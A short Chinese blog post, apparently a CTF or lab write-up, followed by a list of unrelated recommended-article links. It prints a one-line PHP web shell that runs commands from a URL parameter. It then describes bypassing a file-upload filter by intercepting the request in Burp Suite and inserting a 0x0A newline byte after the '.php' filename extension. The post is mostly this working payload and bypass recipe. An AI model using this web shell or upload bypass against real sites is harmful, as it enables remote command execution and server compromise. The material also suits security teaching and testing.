Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
重生之我是Java开发战士2 分钟前
【计算机网络】数据链路层:从帧传输到高速以太网的完整梳理运维行者_4 分钟前
APM 性能监控是什么?从应用监控与网站监控了解基础概念yy我不解释7 分钟前
关于电脑支不支持5Gwifi、无法找到5Gwifi、5Gwifi没有网络的配置问题十月南城10 分钟前
统一日志与链路ID的价值——为什么要结构化日志、如何通过关联ID提升排障效率huangyuchi.11 分钟前
【Linux网络】UDP协议详解:透过源码看透“面向数据报”与“缓冲区”的本质智驱力人工智能13 分钟前
无人机车辆密度检测系统价格 询价准备 需要明确哪些参数 物流园区无人机车辆调度系统 无人机多模态车流密度检测技术BullSmall19 分钟前
Kafka 安全加固实践指南(可直接落地)学网安的肆伍20 分钟前
【039-安全开发篇】JavaEE应用&SpringBoot框架&Actuator监控泄漏&Swagger自动化xinxinhenmeihao21 分钟前
长效住宅静态IP有什么好处?是选择动态IP还是静态IP好?